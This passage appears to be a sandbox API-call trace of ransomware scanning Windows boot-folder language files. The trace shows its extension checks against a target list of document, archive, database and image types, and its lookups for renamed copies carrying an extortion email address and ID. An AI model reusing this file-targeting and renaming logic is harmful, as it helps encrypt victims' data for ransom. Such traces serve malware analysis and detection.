(normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.075] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.075] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.075] lstrlenW (lpString=".doc") returned 4 [0157.075] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.075] lstrlenW (lpString=".docx") returned 5 [0157.075] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.075] lstrlenW (lpString=".pdf") returned 4 [0157.075] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.075] lstrlenW (lpString=".xls") returned 4 [0157.076] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.076] lstrlenW (lpString=".xlsx") returned 5 [0157.076] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.076] lstrlenW (lpString=".ppt") returned 4 [0157.076] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.076] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.076] lstrlenW (lpString=".zip") returned 4 [0157.076] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.076] lstrlenW (lpString=".rar") returned 4 [0157.076] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.076] lstrlenW (lpString=".bz2") returned 4 [0157.076] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.076] lstrlenW (lpString=".7z") returned 3 [0157.076] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.076] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.076] lstrlenW (lpString=".dbf") returned 4 [0157.076] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.076] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.076] lstrlenW (lpString=".1cd") returned 4 [0157.077] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.077] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.077] lstrlenW (lpString=".jpg") returned 4 [0157.077] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.077] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.077] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.077] lstrlenW (lpString=".doc") returned 4 [0157.077] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.077] lstrlenW (lpString=".docx") returned 5 [0157.077] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.077] lstrlenW (lpString=".pdf") returned 4 [0157.077] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.077] lstrlenW (lpString=".xls") returned 4 [0157.077] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.077] lstrlenW (lpString=".xlsx") returned 5 [0157.077] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.077] lstrlenW (lpString=".ppt") returned 4 [0157.078] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.078] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.078] lstrlenW (lpString=".zip") returned 4 [0157.078] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.078] lstrlenW (lpString=".rar") returned 4 [0157.078] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.078] lstrlenW (lpString=".bz2") returned 4 [0157.078] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.078] lstrlenW (lpString=".7z") returned 3 [0157.078] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.078] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.078] lstrlenW (lpString=".dbf") returned 4 [0157.078] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.078] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.078] lstrlenW (lpString=".1cd") returned 4 [0157.078] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.078] lstrlenW (lpString="C:\\Boot\\el-GR\\memtest.exe.mui") returned 29 [0157.078] lstrlenW (lpString=".jpg") returned 4 [0157.078] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.079] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.079] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0157.079] CreateFileW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0157.079] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=74072) returned 1 [0157.079] CloseHandle (hObject=0x3ac) returned 1 [0157.079] GetFileAttributesW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui")) returned 0x20 [0157.080] GetFileAttributesW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.080] CreateFileW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.080] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.080] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.080] lstrlenW (lpString=".doc") returned 4 [0157.080] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.080] lstrlenW (lpString=".docx") returned 5 [0157.080] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.080] lstrlenW (lpString=".pdf") returned 4 [0157.080] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.080] lstrlenW (lpString=".xls") returned 4 [0157.080] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.080] lstrlenW (lpString=".xlsx") returned 5 [0157.080] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.080] lstrlenW (lpString=".ppt") returned 4 [0157.080] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.081] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.081] lstrlenW (lpString=".zip") returned 4 [0157.081] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.081] lstrlenW (lpString=".rar") returned 4 [0157.081] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.081] lstrlenW (lpString=".bz2") returned 4 [0157.081] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.081] lstrlenW (lpString=".7z") returned 3 [0157.081] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.081] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.081] lstrlenW (lpString=".dbf") returned 4 [0157.081] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.081] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.081] lstrlenW (lpString=".1cd") returned 4 [0157.081] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.081] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.081] lstrlenW (lpString=".jpg") returned 4 [0157.081] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.082] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.082] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.082] lstrlenW (lpString=".doc") returned 4 [0157.082] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.082] lstrlenW (lpString=".docx") returned 5 [0157.082] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.082] lstrlenW (lpString=".pdf") returned 4 [0157.082] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.082] lstrlenW (lpString=".xls") returned 4 [0157.082] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.082] lstrlenW (lpString=".xlsx") returned 5 [0157.082] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.082] lstrlenW (lpString=".ppt") returned 4 [0157.082] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.082] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.082] lstrlenW (lpString=".zip") returned 4 [0157.082] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.083] lstrlenW (lpString=".rar") returned 4 [0157.083] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.083] lstrlenW (lpString=".bz2") returned 4 [0157.083] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.083] lstrlenW (lpString=".7z") returned 3 [0157.083] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.083] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.083] lstrlenW (lpString=".dbf") returned 4 [0157.083] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.083] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.083] lstrlenW (lpString=".1cd") returned 4 [0157.083] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.084] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0157.084] lstrlenW (lpString=".jpg") returned 4 [0157.084] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.084] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.084] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0157.084] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0157.085] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=74144) returned 1 [0157.085] CloseHandle (hObject=0x3ac) returned 1 [0157.086] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0157.086] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.086] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.086] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.086] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.086] lstrlenW (lpString=".doc") returned 4 [0157.086] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.086] lstrlenW (lpString=".docx") returned 5 [0157.086] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.086] lstrlenW (lpString=".pdf") returned 4 [0157.086] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.087] lstrlenW (lpString=".xls") returned 4 [0157.087] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.087] lstrlenW (lpString=".xlsx") returned 5 [0157.087] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.087] lstrlenW (lpString=".ppt") returned 4 [0157.087] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.087] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.087] lstrlenW (lpString=".zip") returned 4 [0157.087] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.087] lstrlenW (lpString=".rar") returned 4 [0157.087] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.087] lstrlenW (lpString=".bz2") returned 4 [0157.087] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.087] lstrlenW (lpString=".7z") returned 3 [0157.087] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.087] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.088] lstrlenW (lpString=".dbf") returned 4 [0157.088] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.088] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.088] lstrlenW (lpString=".1cd") returned 4 [0157.088] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.088] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.088] lstrlenW (lpString=".jpg") returned 4 [0157.088] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.088] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.088] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.088] lstrlenW (lpString=".doc") returned 4 [0157.088] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.088] lstrlenW (lpString=".docx") returned 5 [0157.088] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.088] lstrlenW (lpString=".pdf") returned 4 [0157.088] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.088] lstrlenW (lpString=".xls") returned 4 [0157.089] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.089] lstrlenW (lpString=".xlsx") returned 5 [0157.089] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.089] lstrlenW (lpString=".ppt") returned 4 [0157.089] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.089] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.091] lstrlenW (lpString=".zip") returned 4 [0157.091] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.091] lstrlenW (lpString=".rar") returned 4 [0157.091] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.091] lstrlenW (lpString=".bz2") returned 4 [0157.091] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.091] lstrlenW (lpString=".7z") returned 3 [0157.091] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.091] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.091] lstrlenW (lpString=".dbf") returned 4 [0157.091] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.091] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.091] lstrlenW (lpString=".1cd") returned 4 [0157.091] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.091] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0157.091] lstrlenW (lpString=".jpg") returned 4 [0157.091] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.091] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.091] lstrlenW (lpString="memtest.exe.mui") returned 15 [0157.092] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0157.092] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=44960) returned 1 [0157.092] CloseHandle (hObject=0x3ac) returned 1 [0157.092] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0157.092] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.092] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.092] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.092] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.093] lstrlenW (lpString=".doc") returned 4 [0157.093] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.093] lstrlenW (lpString=".docx") returned 5 [0157.093] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.093] lstrlenW (lpString=".pdf") returned 4 [0157.093] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.093] lstrlenW (lpString=".xls") returned 4 [0157.093] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.093] lstrlenW (lpString=".xlsx") returned 5 [0157.093] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.093] lstrlenW (lpString=".ppt") returned 4 [0157.093] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.093] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.093] lstrlenW (lpString=".zip") returned 4 [0157.093] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.093] lstrlenW (lpString=".rar") returned 4 [0157.093] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.093] lstrlenW (lpString=".bz2") returned 4 [0157.093] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.093] lstrlenW (lpString=".7z") returned 3 [0157.093] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.093] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.093] lstrlenW (lpString=".dbf") returned 4 [0157.094] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.094] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.094] lstrlenW (lpString=".1cd") returned 4 [0157.094] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.094] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.094] lstrlenW (lpString=".jpg") returned 4 [0157.094] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.094] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.094] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.094] lstrlenW (lpString=".doc") returned 4 [0157.094] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.094] lstrlenW (lpString=".docx") returned 5 [0157.094] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.094] lstrlenW (lpString=".pdf") returned 4 [0157.094] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.094] lstrlenW (lpString=".xls") returned 4 [0157.094] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.094] lstrlenW (lpString=".xlsx") returned 5 [0157.094] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.094] lstrlenW (lpString=".ppt") returned 4 [0157.094] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.095] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.095] lstrlenW (lpString=".zip") returned 4 [0157.095] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.095] lstrlenW (lpString=".rar") returned 4 [0157.095] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.095] lstrlenW (lpString=".bz2") returned 4 [0157.095] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.095] lstrlenW (lpString=".7z") returned 3 [0157.095] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.095] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.095] lstrlenW (lpString=".dbf") returned 4 [0157.095] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0157.095] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.095] lstrlenW (lpString=".1cd") returned 4 [0157.095] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0157.095] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0157.095] lstrlenW (lpString=".jpg") returned 4 [0157.095] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0157.096] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.096] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0157.096] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0157.096] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=77664) returned 1 [0157.096] CloseHandle (hObject=0x3ac) returned 1 [0157.096] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0157.096] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.097] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.097] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0157.097] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0157.097] lstrlenW (lpString=".doc") returned 4 [0157.097] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0157.097] lstrlenW (lpString=".docx") returned 5 [0157.097] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0157.097] lstrlenW (lpString=".pdf") returned 4 [0157.097] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0157.097] lstrlenW (lpString=".xls") returned 4 [0157.097] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0157.097] lstrlenW (lpString=".xlsx") returned 5 [0157.097] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0157.097] lstrlenW (lpString=".ppt") returned 4 [0157.097] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0157.097] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0157.097] lstrlenW (lpString=".zip") returned 4 [0157.097] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0157.097] lstrlenW (lpString=".rar") returned 4 [0157.097] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0157.097] lstrlenW (lpString=".bz2") returned 4 [0157.097] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0157.097] lstrlenW (lpString=".7z") returned 3 [0157.097] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0157.098] lstrlenW (lpString="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 29 [0157.098] CreateFileW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0157.098] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=45984) returned 1 [0157.098] CloseHandle (hObject=0x3ac) returned 1 [0157.098] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui")) returned 0x20 [0157.098] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.098] CreateFileW (lpFileName="C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.099] CreateFileW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0157.099] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=77664) returned 1 [0157.099] CloseHandle (hObject=0x3ac) returned 1 [0157.099] GetFileAttributesW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui")) returned 0x20 [0157.099] GetFileAttributesW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.099] CreateFileW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.100] CreateFileW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0157.100] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=75104) returned 1 [0157.100] CloseHandle (hObject=0x3ac) returned 1 [0157.100] GetFileAttributesW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui")) returned 0x20 [0157.100] GetFileAttributesW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.100] CreateFileW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.100] CreateFileW 